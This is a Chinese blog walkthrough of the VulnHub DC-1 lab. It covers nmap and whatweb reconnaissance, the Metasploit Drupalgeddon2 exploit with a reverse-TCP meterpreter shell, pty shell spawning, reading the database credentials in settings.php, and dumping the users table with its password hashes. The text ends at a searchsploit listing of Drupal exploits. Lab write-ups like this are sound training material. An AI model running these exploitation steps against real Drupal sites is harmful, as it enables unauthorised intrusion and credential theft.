vulnhub 网站靶机 DC-1 打靶记录
2024-04-30 04:22:38
vulnhub 网站靶机 DC-1 打靶记录
确定IP地址
首先从在虚拟机里面可以得知是实用的桥接模式还是NAT模式,可以确定大致网段
下面进行主机扫描
使用nmap
➜ ~ nmap 192.168.18.0/24 -sn
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:57 CST
Nmap scan report for bogon (192.168.18.1)
Host is up (0.00044s latency).
Nmap scan report for bogon (192.168.18.3)
Host is up (0.00078s latency).
Nmap scan report for bogon (192.168.18.6)
Host is up (0.000075s latency).
Nmap scan report for bogon (192.168.18.18)
Host is up (0.00028s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.63 seconds
查看本机ip可以得知,此靶机地址为192.168.18.18、192.168.18.3
➜ ~ nmap 192.168.18.18 192.168.18.3
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:59 CST
Nmap scan report for bogon (192.168.18.18)
Host is up (0.000068s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbindNmap scan report for bogon (192.168.18.3)
Host is up (0.0046s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
7000/tcp open afs3-fileserver
8001/tcp open vcom-tunnel
8080/tcp open http-proxyNmap done: 2 IP addresses (2 hosts up) scanned in 0.10 seconds
继续扫描查看端口可以得出是192.168.18.18
信息搜集
靶机具体信息搜集
➜ ~ nmap -T4 -A 192.168.18.18
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:59 CST
Nmap scan report for bogon (192.168.18.18)
Host is up (0.00010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 40837/udp6 status
| 100024 1 50483/udp status
| 100024 1 57505/tcp status
|_ 100024 1 60461/tcp6 status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds
扫描过后可以从第七行可以看到ssh 22号端口,第12行可以看出80端口使用了Apache 和Debian ,第13行可以看到站点使用的是Durpal
查看站点cms信息
登录网站http://192.168.18.18
从站点以及上一步可以看出此站点是Drupal搭建
查看cms具体信息
~ whatweb -v 192.168.18.18
WhatWeb report for http://192.168.18.18
Status : 200 OK
Title : Welcome to Drupal Site | Drupal Site
IP : 192.168.18.18
Country : RESERVED, ZZSummary : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.2.22 (from HTTP Server Header)Google Dorks: (3)Website : http://httpd.apache.org/[ Content-Language ]Detect the content-language setting from the HTTP header. String : en[ Drupal ]Drupal is an opensource CMS written in PHP. Aggressive function available (check plugin file or details).Google Dorks: (1)Website : http://www.drupal.org[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Debian LinuxString : Apache/2.2.22 (Debian) (from server string)[ JQuery ]A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/[ MetaGenerator ]This plugin identifies meta generator tags and extracts its value. String : Drupal 7 (http://drupal.org)[ PHP ]PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present. Version : 5.4.45-0+deb7u14Google Dorks: (3)Website : http://www.php.net/[ PasswordField ]find password fields String : pass (from field name)[ Script ]This plugin detects instances of script HTML elements and returns the script language/type. String : text/javascript[ UncommonHeaders ]Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com String : x-generator (from headers)[ X-Powered-By ]X-Powered-By HTTP header String : PHP/5.4.45-0+deb7u14 (from x-powered-by string)HTTP Headers:HTTP/1.1 200 OKDate: Thu, 19 Aug 2021 08:53:33 GMTServer: Apache/2.2.22 (Debian)X-Powered-By: PHP/5.4.45-0+deb7u14Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Thu, 19 Aug 2021 08:53:33 +0000Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0ETag: "1629363213"Content-Language: enX-Generator: Drupal 7 (http://drupal.org)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 2273Connection: closeContent-Type: text/html; charset=utf-8
可以看到cms使用的版本是Drupal 7
国外三大cms
- drupal
- wordpress
- joomla
使用网上大部分解法(别问我为啥不用别的,首先是菜,其次按着轮子走挺香)
开始进行解题
建立连接(tcp反向连接shell)
使用msfconsole进行连接建立shell
➜ ~ msfconsole %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%=[ metasploit v6.0.53-dev ]
+ -- --=[ 2149 exploits - 1143 auxiliary - 366 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]Metasploit tip: Adapter names can be used for IP params
set LHOST eth0msf6 > search drupal //搜索 drupal有关漏洞Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code ExecutionInteract with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_evalmsf6 > use 1 //使用第一个漏洞利用框架
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload
set payload set payloaduuidraw
set payloadprocesscommandline set payloaduuidseed
set payloaduuidname set payloaduuidtracking
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp //使用反向shell攻击载荷
payload => php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set
Display all 110 possibilities? (y or n)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options //查看需要设置的模块Module options (exploit/unix/webapp/drupal_drupalgeddon2):Name Current Setting Required Description---- --------------- -------- -----------DUMP_OUTPUT false no Dump payload command outputPHP_FUNC passthru yes PHP function to executeProxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'RPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI / yes Path to Drupal installVHOST no HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST 192.168.18.6 yes The listen address (an interface may bespecified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic (PHP In-Memory)msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.18.18
rhosts => 192.168.18.18 //设置需要攻击的ip
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit //进行攻击[*] Started reverse TCP handler on 192.168.18.6:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.18.18
[*] Meterpreter session 1 opened (192.168.18.6:4444 -> 192.168.18.18:33672) at 2021-08-19 19:17:00 +0800meterpreter > pwd //攻击成功,查看此时路径
/var/www
meterpreter > ls
Listing: /var/www
=================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r- 174 fil 2013-11-21 04:45:59 +0800 .gitignore
-
100644/rw-r--r- 5767 fil 2013-11-21 04:45:59 +0800 .htaccess
-
100644/rw-r--r- 1481 fil 2013-11-21 04:45:59 +0800 COPYRIGHT.txt
-
100644/rw-r--r- 1451 fil 2013-11-21 04:45:59 +0800 INSTALL.mysql.txt
-
100644/rw-r--r- 1874 fil 2013-11-21 04:45:59 +0800 INSTALL.pgsql.txt
-
100644/rw-r--r- 1298 fil 2013-11-21 04:45:59 +0800 INSTALL.sqlite.txt
-
100644/rw-r--r- 17861 fil 2013-11-21 04:45:59 +0800 INSTALL.txt
-
100755/rwxr-xr- 18092 fil 2013-11-01 18:14:15 +0800 LICENSE.txt
x
100644/rw-r--r- 8191 fil 2013-11-21 04:45:59 +0800 MAINTAINERS.txt
-
100644/rw-r--r- 5376 fil 2013-11-21 04:45:59 +0800 README.txt
-
100644/rw-r--r- 9642 fil 2013-11-21 04:45:59 +0800 UPGRADE.txt
-
100644/rw-r--r- 6604 fil 2013-11-21 04:45:59 +0800 authorize.php
-
100644/rw-r--r- 720 fil 2013-11-21 04:45:59 +0800 cron.php
-
100644/rw-r--r- 52 fil 2019-02-19 21:20:46 +0800 flag1.txt
-
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 includes
100644/rw-r--r- 529 fil 2013-11-21 04:45:59 +0800 index.php
-
100644/rw-r--r- 703 fil 2013-11-21 04:45:59 +0800 install.php
-
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 misc
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 modules
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 profiles
100644/rw-r--r- 1561 fil 2013-11-21 04:45:59 +0800 robots.txt
-
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 scripts
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 sites
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 themes
100644/rw-r--r- 19941 fil 2013-11-21 04:45:59 +0800 update.php
-
100644/rw-r--r- 2178 fil 2013-11-21 04:45:59 +0800 web.config
-
100644/rw-r--r- 417 fil 2013-11-21 04:45:59 +0800 xmlrpc.php
-meterpreter > cat flag1.txt //查看flag1文件内容
Every good CMS needs a config file - and so do you.
看到提示会想到查看config 文件 ,由此找到配置文件(百度一下路径就好)
可以看到路径是/var/www/sites/default/settings.php
然后找到flag2
<?php/**** flag2* Brute force and dictionary attacks aren't the* only ways to gain access (and you WILL need access).* What can you do with these credentials?**/$databases = array ('default' => array ('default' => array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
);/*** Access control for update.php script.** If you are updating your Drupal installation using the update.php script but* are not logged in using either an account with the "Administer software* updates" permission or the site maintenance account (the account that was* created during installation), you will need to modify the access check* statement below. Change the FALSE to a TRUE to disable the access check.* After finishing the upgrade, be sure to open this file again and change the* TRUE back to a FALSE!*/
$update_free_access = FALSE;/*** Salt for one-time login links and cancel links, form tokens, etc.** This variable will be set to a random value by the installer. All one-time* login links will be invalidated if the value is changed. Note that if your* site is deployed on a cluster of web servers, you must ensure that this* variable has the same value on each server. If this variable is empty, a hash* of the serialized database credentials will be used as a fallback salt.** For enhanced security, you may set this variable to a value using the* contents of a file outside your docroot that is never saved together* with any backups of your Drupal files and database.** Example:* $drupal_hash_salt = file_get_contents('/home/example/salt.txt');**/
$drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';/*** Base URL (optional).** If Drupal is generating incorrect URLs on your site, which could* be in HTML headers (links to CSS and JS files) or visible links on pages* (such as in menus), uncomment the Base URL statement below (remove the* leading hash sign) and fill in the absolute URL to your Drupal installation.** You might also want to force users to use a given domain.* See the .htaccess file for more information.** Examples:* $base_url = 'http://www.example.com';* $base_url = 'http://www.example.com:8888';* $base_url = 'http://www.example.com/drupal';* $base_url = 'https://www.example.com:8888/drupal';** It is not allowed to have a trailing slash; Drupal will add it* for you.*/
# $base_url = 'http://www.example.com'; // NO trailing slash!/*** PHP settings:** To see what PHP settings are possible, including whether they can be set at* runtime (by using ini_set()), read the PHP documentation:* http://www.php.net/manual/en/ini.list.php* See drupal_environment_initialize() in includes/bootstrap.inc for required* runtime settings and the .htaccess file for non-runtime settings. Settings* defined there should not be duplicated here so as to avoid conflict issues.*//*** Some distributions of Linux (most notably Debian) ship their PHP* installations with garbage collection (gc) disabled. Since Drupal depends on* PHP's garbage collection for clearing sessions, ensure that garbage* collection occurs by using the most common settings.*/
ini_set('session.gc_probability', 1);
ini_set('session.gc_divisor', 100);/*** Set session lifetime (in seconds), i.e. the time from the user's last visit* to the active session may be deleted by the session garbage collector. When* a session is deleted, authenticated users are logged out, and the contents* of the user's $_SESSION variable is discarded.*/
ini_set('session.gc_maxlifetime', 200000);/*** Set session cookie lifetime (in seconds), i.e. the time from the session is* created to the cookie expires, i.e. when the browser is expected to discard* the cookie. The value 0 means "until the browser is closed".*/
ini_set('session.cookie_lifetime', 2000000);/*** If you encounter a situation where users post a large amount of text, and* the result is stripped out upon viewing but can still be edited, Drupal's* output filter may not have sufficient memory to process it. If you* experience this issue, you may wish to uncomment the following two lines* and increase the limits of these variables. For more information, see* http://php.net/manual/en/pcre.configuration.php.*/
# ini_set('pcre.backtrack_limit', 200000);
# ini_set('pcre.recursion_limit', 200000);/*** Drupal automatically generates a unique session cookie name for each site* based on its full domain name. If you have multiple domains pointing at the* same Drupal site, you can either redirect them all to a single domain (see* comment in .htaccess), or uncomment the line below and specify their shared* base domain. Doing so assures that users remain logged in as they cross* between your various domains. Make sure to always start the $cookie_domain* with a leading dot, as per RFC 2109.*/
# $cookie_domain = '.example.com';/*** Variable overrides:** To override specific entries in the 'variable' table for this site,* set them here. You usually don't need to use this feature. This is* useful in a configuration file for a vhost or directory, rather than* the default settings.php. Any configuration setting from the 'variable'* table can be given a new value. Note that any values you provide in* these variable overrides will not be modifiable from the Drupal* administration interface.** The following overrides are examples:* - site_name: Defines the site's name.* - theme_default: Defines the default theme for this site.* - anonymous: Defines the human-readable name of anonymous users.* Remove the leading hash signs to enable.*/
# $conf['site_name'] = 'My Drupal site';
# $conf['theme_default'] = 'garland';
# $conf['anonymous'] = 'Visitor';/*** A custom theme can be set for the offline page. This applies when the site* is explicitly set to maintenance mode through the administration page or when* the database is inactive due to an error. It can be set through the* 'maintenance_theme' key. The template file should also be copied into the* theme. It is located inside 'modules/system/maintenance-page.tpl.php'.* Note: This setting does not apply to installation and update pages.*/
# $conf['maintenance_theme'] = 'bartik';/*** Reverse Proxy Configuration:** Reverse proxy servers are often used to enhance the performance* of heavily visited sites and may also provide other site caching,* security, or encryption benefits. In an environment where Drupal* is behind a reverse proxy, the real IP address of the client should* be determined such that the correct client IP address is available* to Drupal's logging, statistics, and access management systems. In* the most simple scenario, the proxy server will add an* X-Forwarded-For header to the request that contains the client IP* address. However, HTTP headers are vulnerable to spoofing, where a* malicious client could bypass restrictions by setting the* X-Forwarded-For header directly. Therefore, Drupal's proxy* configuration requires the IP addresses of all remote proxies to be* specified in $conf['reverse_proxy_addresses'] to work correctly.** Enable this setting to get Drupal to determine the client IP from* the X-Forwarded-For header (or $conf['reverse_proxy_header'] if set).* If you are unsure about this setting, do not have a reverse proxy,* or Drupal operates in a shared hosting environment, this setting* should remain commented out.** In order for this setting to be used you must specify every possible* reverse proxy IP address in $conf['reverse_proxy_addresses'].* If a complete list of reverse proxies is not available in your* environment (for example, if you use a CDN) you may set the* $_SERVER['REMOTE_ADDR'] variable directly in settings.php.* Be aware, however, that it is likely that this would allow IP* address spoofing unless more advanced precautions are taken.*/
# $conf['reverse_proxy'] = TRUE;/*** Specify every reverse proxy IP address in your environment.* This setting is required if $conf['reverse_proxy'] is TRUE.*/
# $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);/*** Set this value if your proxy server sends the client IP in a header* other than X-Forwarded-For.*/
# $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';/*** Page caching:** By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page* views. This tells a HTTP proxy that it may return a page from its local* cache without contacting the web server, if the user sends the same Cookie* header as the user who originally requested the cached page. Without "Vary:* Cookie", authenticated users would also be served the anonymous page from* the cache. If the site has mostly anonymous users except a few known* editors/administrators, the Vary header can be omitted. This allows for* better caching in HTTP proxies (including reverse proxies), i.e. even if* clients send different cookies, they still get content served from the cache.* However, authenticated users should access the site directly (i.e. not use an* HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid* getting cached pages from the proxy.*/
# $conf['omit_vary_cookie'] = TRUE;/*** CSS/JS aggregated file gzip compression:** By default, when CSS or JS aggregation and clean URLs are enabled Drupal will* store a gzip compressed (.gz) copy of the aggregated files. If this file is* available then rewrite rules in the default .htaccess file will serve these* files to browsers that accept gzip encoded content. This allows pages to load* faster for these users and has minimal impact on server load. If you are* using a webserver other than Apache httpd, or a caching reverse proxy that is* configured to cache and compress these files itself you may want to uncomment* one or both of the below lines, which will prevent gzip files being stored.*/
# $conf['css_gzip_compression'] = FALSE;
# $conf['js_gzip_compression'] = FALSE;/*** String overrides:** To override specific strings on your site with or without enabling the Locale* module, add an entry to this list. This functionality allows you to change* a small number of your site's default English language interface strings.** Remove the leading hash signs to enable.*/
# $conf['locale_custom_strings_en'][''] = array(
# 'forum' => 'Discussion board',
# '@count min' => '@count minutes',
# );/**** IP blocking:** To bypass database queries for denied IP addresses, use this setting.* Drupal queries the {blocked_ips} table by default on every page request* for both authenticated and anonymous users. This allows the system to* block IP addresses from within the administrative interface and before any* modules are loaded. However on high traffic websites you may want to avoid* this query, allowing you to bypass database access altogether for anonymous* users under certain caching configurations.** If using this setting, you will need to add back any IP addresses which* you may have blocked via the administrative interface. Each element of this* array represents a blocked IP address. Uncommenting the array and leaving it* empty will have the effect of disabling IP blocking on your site.** Remove the leading hash signs to enable.*/
# $conf['blocked_ips'] = array(
# 'a.b.c.d',
# );/*** Fast 404 pages:** Drupal can generate fully themed 404 pages. However, some of these responses* are for images or other resource files that are not displayed to the user.* This can waste bandwidth, and also generate server load.** The options below return a simple, fast 404 page for URLs matching a* specific pattern:* - 404_fast_paths_exclude: A regular expression to match paths to exclude,* such as images generated by image styles, or dynamically-resized images.* If you need to add more paths, you can add '|path' to the expression.* - 404_fast_paths: A regular expression to match paths that should return a* simple 404 page, rather than the fully themed 404 page. If you don't have* any aliases ending in htm or html you can add '|s?html?' to the expression.* - 404_fast_html: The html to return for simple 404 pages.** Add leading hash signs if you would like to disable this functionality.*/
$conf['404_fast_paths_exclude'] = '/\/(?:styles)\//';
$conf['404_fast_paths'] = '/\.(?:txt|png|gif|jpe?g|css|js|ico|swf|flv|cgi|bat|pl|dll|exe|asp)$/i';
$conf['404_fast_html'] = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "@path" was not found on this server.</p></body></html>';/*** By default the page request process will return a fast 404 page for missing* files if they match the regular expression set in '404_fast_paths' and not* '404_fast_paths_exclude' above. 404 errors will simultaneously be logged in* the Drupal system log.** You can choose to return a fast 404 page earlier for missing pages (as soon* as settings.php is loaded) by uncommenting the line below. This speeds up* server response time when loading 404 error pages and prevents the 404 error* from being logged in the Drupal system log. In order to prevent valid pages* such as image styles and other generated content that may match the* '404_fast_html' regular expression from returning 404 errors, it is necessary* to add them to the '404_fast_paths_exclude' regular expression above. Make* sure that you understand the effects of this feature before uncommenting the* line below.*/
# drupal_fast_404();/*** External access proxy settings:** If your site must access the Internet via a web proxy then you can enter* the proxy settings here. Currently only basic authentication is supported* by using the username and password variables. The proxy_user_agent variable* can be set to NULL for proxies that require no User-Agent header or to a* non-empty string for proxies that limit requests to a specific agent. The* proxy_exceptions variable is an array of host names to be accessed directly,* not via proxy.*/
# $conf['proxy_server'] = '';
# $conf['proxy_port'] = 8080;
# $conf['proxy_username'] = '';
# $conf['proxy_password'] = '';
# $conf['proxy_user_agent'] = '';
# $conf['proxy_exceptions'] = array('127.0.0.1', 'localhost');/*** Authorized file system operations:** The Update manager module included with Drupal provides a mechanism for* site administrators to securely install missing updates for the site* directly through the web user interface. On securely-configured servers,* the Update manager will require the administrator to provide SSH or FTP* credentials before allowing the installation to proceed; this allows the* site to update the new files as the user who owns all the Drupal files,* instead of as the user the webserver is running as. On servers where the* webserver user is itself the owner of the Drupal files, the administrator* will not be prompted for SSH or FTP credentials (note that these server* setups are common on shared hosting, but are inherently insecure).** Some sites might wish to disable the above functionality, and only update* the code directly via SSH or FTP themselves. This setting completely* disables all functionality related to these authorized file operations.** @see http://drupal.org/node/244924** Remove the leading hash signs to disable.*/
# $conf['allow_authorize_operations'] = FALSE;可以看到找到了mysql的密码登录数据库
meterpreter > shell
Process 3396 created.
Channel 3029 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ mysql -udbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 83
Server version: 5.5.60-0+deb7u1 (Debian)Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
| 3 | user | $S$D40atfVwB3DZUjxI71G.RcnVqZ6C/zY2YoBuvMYETAMDhWxo1KRX | | | | NULL | 0 | 1629359199 | 1629359199 | 1 | NULL | | 0 | | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
4 rows in set (0.00 sec)
此处思路是更改admin的密码使用脚本生成新的hash然后使用sql语句覆盖掉原来密码(此处因该是使用scripts脚本中password脚本生成新密码,然后update覆盖掉旧值)
我实用的现成的攻击脚本
searchsploit Drupal
---------------------------------------------------------------------- ---------------------------------Exploit Title | Path
---------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilitie | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwor | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwor | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Executi | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
